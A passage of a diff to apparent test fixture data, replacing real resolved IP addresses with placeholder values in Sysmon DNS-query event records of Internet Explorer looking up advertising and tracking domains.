Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5463,7 +5463,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693033600Z'/\u003e\u003cEventRecordID\u003e155\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.508\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eappnexus-partners.tremorhub.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5475,7 +5475,7 @@ "ProcessId": "2736", "QueryName": "appnexus-partners.tremorhub.com", "QueryStatus": "0", - "QueryResults": "type: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:107.21.43.184;::ffff:54.164.220.86;::ffff:52.72.172.174;::ffff:3.209.65.250;::ffff:3.94.51.187;::ffff:34.193.211.130;::ffff:18.214.47.10;::ffff:18.214.151.246;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 partners-1732315393.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", @@ -5505,7 +5505,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693044900Z'/\u003e\u003cEventRecordID\u003e156\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.531\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.dlx.addthis.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5524,7 +5524,7 @@ "event_data": { "QueryName": "x.dlx.addthis.com", "QueryStatus": "0", - "QueryResults": "type: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:107.21.14.70;::ffff:107.23.33.163;::ffff:23.22.192.59;::ffff:100.24.96.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 gtm13.nexac.com;type: 5 ad2deadfb5fbf11e9872302ad9419486-194325762.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.531", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5547,7 +5547,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693057200Z'/\u003e\u003cEventRecordID\u003e157\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.532\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edh.serving-sys.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5564,7 +5564,7 @@ "ProcessId": "2736", "QueryName": "dh.serving-sys.com", "QueryStatus": "0", - "QueryResults": "type: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:18.205.112.71;::ffff:50.19.40.146;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "type: 5 haproxy-dmp.sizmdx.com;type: 5 dmp-prod-haproxyd-14y2amas34vrd-330219680.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.532", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -5586,7 +5586,7 @@ { "@timestamp": "2021-05-05T15:30:51.707Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693070300Z'/\u003e\u003cEventRecordID\u003e158\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5598,7 +5598,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;", + "QueryResults": "type: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.534", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5650,7 +5650,7 @@ "event_data": { "QueryName": "tags.rd.linksynergy.com", "QueryStatus": "0", - "QueryResults": "::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.601", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5661,7 +5661,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -5675,7 +5675,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -5684,7 +5684,7 @@ "ProcessId": "2736", "QueryName": "rtb-csync.smartadserver.com", "QueryStatus": "0", - "QueryResults": "type: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 